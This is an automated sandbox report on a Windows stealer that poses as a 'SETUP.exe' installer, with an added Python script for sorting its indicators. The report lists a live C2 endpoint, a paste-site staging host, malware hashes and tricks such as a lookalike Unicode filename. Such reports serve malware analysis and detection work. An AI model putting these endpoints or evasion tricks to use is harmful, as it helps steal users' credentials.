                                                                                https://rentry.co/static/icons/270.png#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drfalse
                                                                                  high
                                                                                  https://www.ecosia.org/newtab/#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890121159.0000000003907000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696495411400900000.2&ci=1696495411208.#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://ac.ecosia.org/autocomplete?q=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://crl.micropowershell.exe, 00000007.00000002.2257624575.0000000003094000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                                              high
                                                                                              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://rentry.co/#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2253914618.0000000003661000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2252940545.0000000000872000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000002.2256477161.0000000000888000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2245994632.0000000000886000.00000004.00000020.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.2246120073.0000000000872000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.000000000508C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000004EBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2258828661.0000000005092000.00000004.00000800.00020000.00000000.sdmp, KOZ4VON644XMYEN5.ps1.0.drfalse
                                                                                                  high
                                                                                                  http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                                                    high
                                                                                                    http://www.testlab2008.com/indices/submit.php?c=CD&i=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exefalse
                                                                                                    • Avira URL Cloud: safe
                                                                                                    unknown
                                                                                                    http://crt.rootca1.amazontrust.com/rootca1.cer0?#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1888845598.000000000369B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqd4plX4pbW1CbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907799374.0000000003679000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1890442481.000000000367A000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907000807.000000000366E000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1907385996.0000000003679000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631266942.0000000003618000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631164449.000000000361B000.00000004.00000800.00020000.00000000.sdmp, #Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1631390635.000000000361A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://traveladdicts.top:443/api#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe, 00000000.00000003.1908607385.0000000000897000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.26.3.16 | rentry.co | United States | 13335 | CLOUDFLARENETUS | false
172.67.202.141 | traveladdicts.top | United States | 13335 | CLOUDFLARENETUS | true
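As an added triage helper (not part of the Joe Sandbox report or its tooling), the following Python script takes a subset of the URL rows and the two resolved-IP rows above, copied from this page, and (a) NFKC-normalizes the math-alphabet sample name so a plain filename rule can match it, (b) sorts the carved hostnames into buckets, and (c) lists URLs whose URL-cloud verdict contradicts the report's own verdict on the resolved host. The bucket names, the PKI-host heuristic and the choice of rows are my assumptions, not a classification the report makes.

```python
"""Triage the carved-URL and resolved-IP tables of the report above (added example)."""
import unicodedata
from collections import defaultdict
from urllib.parse import urlsplit

# Sample name exactly as the report shows it: mathematical sans-serif bold italic
# capitals U+1D64E U+1D640 U+1D64F U+1D650 U+1D64B, then ".exe".
SAMPLE_NAME = "\U0001d64e\U0001d640\U0001d64f\U0001d650\U0001d64b.exe"

# Resolved-IP table from the report: ip -> (domain, "Malicious" column).
IP_TABLE = {
    "104.26.3.16": ("rentry.co", False),
    "172.67.202.141": ("traveladdicts.top", True),
}

# A subset of the report's URL rows, copied from the page: (url, processes or dropped
# files the string was carved from, "Malicious" column, antivirus detection, reputation).
URL_ROWS = [
    ("https://traveladdicts.top:443/api", (SAMPLE_NAME,), False, "Avira URL Cloud: safe", "unknown"),
    ("https://traveladdicts.top/api6Ic=", (SAMPLE_NAME,), False, "Avira URL Cloud: safe", "unknown"),
    ("https://rentry.co/", (SAMPLE_NAME, "powershell.exe", "KOZ4VON644XMYEN5.ps1.0.dr"), False, None, "high"),
    ("https://rentry.co/static/icons/270.pnghZ", ("powershell.exe",), False, None, "high"),
    ("http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y", (SAMPLE_NAME,), False, None, "high"),
    ("http://ocsp.rootca1.amazontrust.com0:", (SAMPLE_NAME,), False, None, "high"),
    ("http://x1.c.lencr.org/0", (SAMPLE_NAME,), False, None, "high"),
    ("https://ac.ecosia.org/autocomplete?q=", (SAMPLE_NAME,), False, None, "high"),
    ("https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=", (SAMPLE_NAME,), False, None, "high"),
    ("http://www.testlab2008.com/indices/submit.php?c=CD&i=", (SAMPLE_NAME,), False, "Avira URL Cloud: safe", "unknown"),
]

# Heuristic (my assumption, not the report's): hosts that certificate chains point at
# for revocation checks or chain building are TLS/Authenticode noise, not stealer logic.
PKI_PREFIXES = ("crl.", "ocsp.", "crt.")
PKI_HOSTS = {"x1.c.lencr.org", "x1.i.lencr.org", "sectigo.com"}


def ascii_lookalike(name: str) -> str:
    """Fold Unicode compatibility forms (math alphabets and the like) to base letters.

    NFKC maps U+1D64E to 'S', so a filename rule written against the normalized
    name matches both SETUP.exe and its math-alphabet lookalike.
    """
    return unicodedata.normalize("NFKC", name)


def host_of(url: str) -> str:
    """Lower-cased hostname of a carved URL; port and carving junk in the path are ignored."""
    return urlsplit(url).hostname or ""


def classify(url_rows, ip_table):
    """Group hostnames into triage buckets; returns a dict of bucket name -> set of hosts."""
    flagged = {domain for domain, bad in ip_table.values() if bad}
    buckets = defaultdict(set)
    for url, sources, _malicious_col, _av, reputation in url_rows:
        host = host_of(url)
        if host in flagged:
            buckets["c2_resolved_malicious"].add(host)
        elif host.startswith(PKI_PREFIXES) or host in PKI_HOSTS:
            buckets["pki_chain_fetch"].add(host)
        elif any(s == "powershell.exe" or s.endswith(".ps1.0.dr") for s in sources):
            buckets["second_stage_powershell"].add(host)
        elif reputation == "unknown":
            buckets["unknown_reputation"].add(host)
        else:
            buckets["high_reputation_other"].add(host)
    return dict(buckets)


def verdict_conflicts(url_rows, ip_table):
    """URLs a URL-reputation cloud rated safe although the report marks their host malicious."""
    flagged = {domain for domain, bad in ip_table.values() if bad}
    return sorted(url for url, _s, _m, av, _r in url_rows
                  if av and av.endswith("safe") and host_of(url) in flagged)


if __name__ == "__main__":
    print("normalized sample name:", ascii_lookalike(SAMPLE_NAME))
    for bucket, hosts in sorted(classify(URL_ROWS, IP_TABLE).items()):
        print(f"{bucket}: {', '.join(sorted(hosts))}")
    for url in verdict_conflicts(URL_ROWS, IP_TABLE):
        print("conflict:", url)
```

The carving junk is left on the hostnames on purpose (ocsp.rootca1.amazontrust.com0 stays as carved) so the output can be matched back to the report row; the prefix heuristic still buckets it correctly, but anything destined for a blocklist should be taken from the resolved-IP table, not from a carved string.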
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1601483
Start date and time: 2025-01-28 16:11:11 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 46s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: 𝙎𝙀𝙏𝙐𝙋.exe
renamed because original name is a hash value
Original Sample Name: .exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@4/4@4/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 9
• Number of non-executed functions: 2
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212, 13.95.31.18, 4.175.87.197
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target 𝙎𝙀𝙏𝙐𝙋.exe, PID 7772 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 4640 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
10:12:34 | API Interceptor | 9x Sleep call for process: 𝙎𝙀𝙏𝙐𝙋.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.3.16 | random.exe | malicious | LummaC | -
104.26.3.16 | 𝐒𝐞𝐭𝐮𝐩.exe | malicious | LummaC | -
104.26.3.16 | random.exe | malicious | LummaC | -
104.26.3.16 | same.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar, XWorm | -
104.26.3.16 | !Setup.exe | malicious | LummaC Stealer | -
104.26.3.16 | Full-Setup.exe | malicious | LummaC | -
104.26.3.16 | file.ps1 | malicious | LummaC Stealer | -
104.26.3.16 | grA6aqodO5.exe | malicious | Python Stealer, CStealer | -
104.26.3.16 | SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe | malicious | XWorm | -
104.26.3.16 | nkYzjyrKYK.exe | malicious | Babadeda | -
172.67.202.141 | Jeffrey.laws Replay VM (01m27sec).docx | malicious | HTMLPhisher | -
172.67.202.141 | phish_alert_sp2_2.0.0.0 (27).eml | malicious | HTMLPhisher | -
172.67.202.141 | https://deutsche-post-infos.com/ | malicious | Unknown | -
172.67.202.141 | http://mail.finance-asp4.com | malicious | Unknown | -
172.67.202.141 | http://weatherchalk.org | malicious | Unknown | -
172.67.202.141 | https://analytics.webnorth.cloud/?module=Login&action=acceptInvitation&token=4e85c7ac842c08a74fec44d4668b7a9a | malicious | Unknown | -
172.67.202.141 | uX24M5IH33.exe | malicious | Raccoon RedLine SmokeLoader | -
Match | Associated Sample Name / URL | Detection | Threat Name | Context
rentry.co | random.exe | malicious | LummaC | 104.26.3.16
rentry.co | random.exe | malicious | Amadey, AsyncRAT, LummaC Stealer, PureLog Stealer, Socks5Systemz, Stealc, Vidar | 104.26.2.16
rentry.co | atlantis4en.exe | malicious | LummaC Stealer | 104.26.2.16
rentry.co | 𝐒𝐞𝐭𝐮𝐩.exe | malicious | LummaC Stealer | 104.26.2.16
rentry.co | 𝐒𝐞𝐭𝐮𝐩.exe | malicious | LummaC | 104.26.3.16
rentry.co | random.exe | malicious | LummaC, Amadey, Babadeda, LummaC Stealer, PureLog Stealer | 104.26.3.16
rentry.co | random.exe | malicious | LummaC | 104.26.3.16
rentry.co | random.exe | malicious | LummaC | 172.67.75.40
rentry.co | XWorm RAT V2.1.exe | malicious | Njrat, XWorm | 172.67.75.40
rentry.co | random.exe | malicious | Amadey, LummaC Stealer, Stealc | 172.67.75.40
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://pub-6001c4a55cf84413a41e24da9a9d5948.r2.dev/OnDrive-%20complete%20with%20Docx.html | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | Set-UPl.exe | malicious | LummaC Stealer | 188.114.96.3
CLOUDFLARENETUS | https://share.hsforms.com/1_2WOdMKeTWCrk3shrRFEBQt7nc8 | malicious | HTMLPhisher | 104.16.117.116
CLOUDFLARENETUS | Thegarden Benefit Memo.pdf | malicious | Unknown | 104.21.2.8
CLOUDFLARENETUS | PDFQOUTE COMFIRMATION pdf.exe | malicious | MassLogger RAT | 104.21.16.1
CLOUDFLARENETUS | MACHINE QUOTATION.exe | malicious | AgentTesla | 172.67.74.152
CLOUDFLARENETUS | file_1737764438853.pdf | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | WebCompanionInstaller-12.901.5.1061-prod.exe | malicious | Unknown | 104.16.149.130
CLOUDFLARENETUS | WebCompanionInstaller-12.901.5.1061-prod.exe | malicious | Unknown | 104.16.148.130
CLOUDFLARENETUS | https://forms.office.com/e/UfhfB5zRti | malicious | HTMLPhisher | 104.17.25.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Set-UPl.exe | malicious | LummaC Stealer | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | vxaZNB3wGd.exe | malicious | Unknown | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | k6JaohgQKp.msi | malicious | Unknown | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | a33kcGf1aA.exe | malicious | Unknown | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | vxaZNB3wGd.exe | malicious | Unknown | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | a33kcGf1aA.exe | malicious | Unknown | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | cHAxMzM3_crypted_LAB.exe | malicious | LummaC | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | REQUIRED-ORDER-REF.cmd.exe | malicious | DBatLoader, MassLogger RAT, PureLog Stealer | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | Racoona.hta | malicious | LummaC Stealer | 104.26.3.16, 172.67.202.141
a0e9f5d64349fb13191bc781f81f42e1 | setup.exe | malicious | LummaC Stealer | 104.26.3.16, 172.67.202.141
No context
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 0.6599547231656377
Encrypted: false
SSDEEP: 3:Nllluly/:NllU
MD5: CD58C7193AF7B74B8F5AB012CEAA83D1
SHA1: 48F5F741531E2611CC155853BB9BFCF470AD2262
SHA-256: AA0870FDCF90E60FC4555437FED5E92D49DE3A7C81E2E66D5763B25CF58EE4D7
SHA-512: B2F920ED07178691B4568D9459954BE281284DBA8E5DAC76147764180AE78306E32630098A1EA2F8D5721E56B87EE80E6C96BF73E96F44D3A19F15759613F3CF
Malicious: false
Reputation: moderate, very likely benign file
Preview: @...e...........................................................
Process: C:\Users\user\Desktop\𝙎𝙀𝙏𝙐𝙋.exe
File Type: HTML document, ASCII text, with very long lines (945)
Category: dropped
Size (bytes): 4452
Entropy (8bit): 5.066280681782208
Encrypted: false
SSDEEP: 48:5q41lJM8WOxEj4/wPsAG4oevjKEcXrCnBBkpBxVGLrGWnSTw2wptI8Id6Pu:5hPA5jKEcXrCnTkpBxFEnx/ICu
MD5: 73F2D5F6E4AB794BFA3A93027F8A2FF1
SHA1: 336CB9EC424BAF14B0D0BE79062A563C155C75A1
SHA-256: 9A7045BCD93502F439AE8FD2B1B322181F9A94A6A15262199CC693C04ACA22CF
SHA-512: 1484CD5BD4E6D75E17ABCFC6CBFB1CB776AB0EBB6340DA70C796E1A02349FB917C6FB617F21EDEEB82C848E6205911371E5815B01FB9E0786AF62E459EE0E91E
Malicious: true
Reputation: low
Preview: <!DOCTYPE html>..<html>...<head>. <meta charset="utf-8">. .<title>Error</title>.. . <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free.">. <meta name="keywords" content="paste, markdown, publishing, markdown paste, markdown from command line">.. <meta name="twitter:card" content="summary" />. <meta name="twitter:description" content="Markdown paste service with preview, custom urls and editing." />. <meta name="twitter:title" content="Rentry.co - Markdown Paste" />. <meta name="twitter:site" content="@rentry_co" />. <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" />.. <meta property="og:url" content="https://rentry.co/" />. <meta property="og:title" content="Rentry.co - Markdown Paste Service" />. <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." />. <meta property="og:image" content="https://rentr
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Reputation: high, very likely benign file
Preview: # PowerShell test file to determine AppLocker lockdown mode
File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.519358653105247
TrID:
• Win32 Executable (generic) a (10002005/4) 99.79%
• Win32 Executable Delphi generic (14689/80) 0.15%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name:#Ud835#Ude4e#Ud835#Ude40#Ud835#Ude4f#Ud835#Ude50#Ud835#Ude4b.exe
File size:1'730'416 bytes
MD5:c6107e0d217c3ce4f5d8c6198622556b
SHA1:77a152d6872184eb11824aea4371b7cb9577ea5d
SHA256:fec28394e0eef7ed5360f4a4ad4dc04e7c38afa25cb3086f988042a383dfe97d
SHA512:4a776b895a655f8ff8d0c454f88b3a5af5bbdafa0b2cdbe0764220cf998aa29dea1077e2a52b17fe948c39331e417c37f6692ab813d206852d3dc416f9977bae
SSDEEP:24576:vrIWzIGJHrHPcf6ZzI5SuxumqUQk0+xBFQbtLlDy/pyy/pNNx4/rdnfRSnJ8eR7H:vN7JbTIAtRe/P//2rdf6
TLSH:F4858E225C6465A9FB5242B53F791E22C83D3F322FA4552CAB627D8C2EBCF6B55041C3
File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
Icon Hash:5fc1c131094d9e07
Entrypoint:0x463c48
Entrypoint Section:CODE
Digitally signed:true
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:1
OS Version Minor:0
File Version Major:1
File Version Minor:0
Subsystem Version Major:1
Subsystem Version Minor:0
Import Hash:92db50972771bbc9741d8dba3b89adb3
Signature Valid:false
Signature Issuer:CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:The digital signature of the object did not verify
Error Number:-2146869232
Not Before:03/05/2023 01:00:00
Not After:03/05/2026 00:59:59
Subject Chain:
• CN=Emjysoft, O=Emjysoft, S=Auvergne-Rhône-Alpes, C=FR
Version:3
Thumbprint MD5:3A209510BAACD4B48C20A0F8656AA26A
Thumbprint SHA-1:47D58D082C452B3086973BEE37FB549F965F9E0B
Thumbprint SHA-256:6F9838A2DA08559B3E0FE2156E99EA0AA4F3D1CD43675980B806CDECA7A5E616
Serial:00989AAB57D7FCC43812B213AEDEA41AB6
Instruction (disassembly at entrypoint):
push ebp
mov ebp, esp
add esp, FFFFFFF4h
push ebx
mov eax, 00463A68h
call 00007F48687F45D0h
mov ebx, dword ptr [00464D18h]
mov eax, dword ptr [ebx]
call 00007F4868819D07h
mov eax, dword ptr [ebx]
mov edx, 00463D08h
call 00007F4868819A13h
mov eax, dword ptr [ebx]
add eax, 34h
mov edx, 00463D38h
call 00007F48687F2B1Ch
mov ecx, dword ptr [00464BCCh]
mov eax, dword ptr [ebx]
mov edx, dword ptr [00463614h]
call 00007F4868819CF1h
mov ecx, dword ptr [00464D54h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [0046205Ch]
call 00007F4868819CDEh
mov ecx, dword ptr [00464D7Ch]
mov eax, dword ptr [ebx]
mov edx, dword ptr [00462C68h]
call 00007F4868819CCBh
mov ecx, dword ptr [00464D68h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [004602F4h]
call 00007F4868819CB8h
mov ecx, dword ptr [00464DF4h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [0044EA78h]
call 00007F4868819CA5h
mov ecx, dword ptr [00464DCCh]
mov eax, dword ptr [ebx]
mov edx, dword ptr [0045F9B0h]
call 00007F4868819C92h
mov eax, dword ptr [ebx]
call 00007F4868819D17h
pop ebx
call 00007F48687F2919h
Data directories:
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x66000 | 0x1e1c | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x71000 | 0x136e00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1a3a00 | 0x2d70 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6a000 | 0x66e0 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x69000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Sections:
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
